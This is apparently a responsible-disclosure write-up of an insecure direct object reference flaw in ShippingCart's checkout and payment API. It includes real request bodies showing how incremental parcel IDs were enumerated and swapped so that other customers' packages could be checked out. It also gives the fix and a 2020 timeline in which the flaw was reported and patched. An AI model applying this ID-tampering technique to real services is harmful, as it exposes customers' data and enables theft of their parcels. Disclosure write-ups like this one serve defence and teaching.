ShippingCart

About ShippingCart

ShippingCart is the fastest growing cross-border delivery service straight to your doorstep. They have a secure easy-to-use system, free consolidation services, fast shipping, and affordability are trusted and loved by their customers.

Ability to leak parcel data on shippingcart

When a user Initiated a checkout a request will be sent to the endpoint below to get the parcel details.

POST /api/checkout/ HTTP/1.1
Host: sc-api.prod.shippingcart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
[..]
{"token":"","air":{"items":[1505876,1563242]},"sea":{"items":[]},"insurance":{"1505876":"40.00","1563242":"20.00"},"shipment_location_details":{"origin":"US","destination":"PH"},"warehouse_id":{"1505876":1,"1563242":1}}

As someone with a background in Web Application Pentesting you will surely notice the {"items":[1505876,1563242]} Lets call this our itemID, Once ShippingCart received a package under your name and address it will be linked to your account and a itemID will be generated.

Since the itemID is generated incrementally we can enumerate every packages in ShippingCart including its status.

{
 "id": 1563242,
 "images": "https://s3-us-west-1.amazonaws.com/zone24x7-ocr-prod/hayward_usa/images/originals/17-349966-07162020185052-2.png",
 "description": "clothing",
 "is_abandoned": 0
}

Checkout other users package on shippingcart

To start the payment process, A request will be sent to the endpoint below along with the payment and package details. We see in the request that we are shipping the itemID 1563252, So what do you think will happen if we change the itemID to a different one that we dont own? We get to steal their package!

POST /api/payment/ HTTP/1.1
Host: sc-api.prod.shippingcart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
[...]

{"token":"JWT","air":{"items":[1563252],"address":"108870","note":""},"insurance":{"1563250":"1.00"},"payment_method":"credit_card","payment_provider":"paypal","promo_code":"","shipment_location_details":{"origin":"US","destination":"PH"},"warehouse_id":{"1563250":1}}

ShippingCart

Pay for the shipping fee and after two weeks you will receive your candy LOL

HTTP/1.1 200 OK
Date: Fri, 17 Jul 2020 11:12:59 GMT
Content-Type: application/vnd.api+json
Connection: close
[..]
{"parameters":{"payments":{"reference_id":"76437539","method":"paypal","token":"EC-42N68657B8392571P","redirect":"https:\/\/www.paypal.com\/checkoutnow?token=EC-42N68657B8392571P&useraction=commit"},"summary":{"php":{"total_price":"16.99"}}}}

Our little culprit is called Insecure Direct Object References, This allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more.

The best way to prevent IDOR is to perform an access control check to see if the user is authorized to access the requested object.

Note:

The vulnerability was reported to QuadX’s Product Security Team via Secuna. QuadX takes privacy and data security very seriously they worked quickly to resolve the reported issue.

Timeline:

  • July 17, 2020: Reported the Vulnerability to QuadX via Secuna.
  • July 18, 2020: QuadX acknowledges the Vulnerability.
  • July 29, 2020: Vulnerability fixed.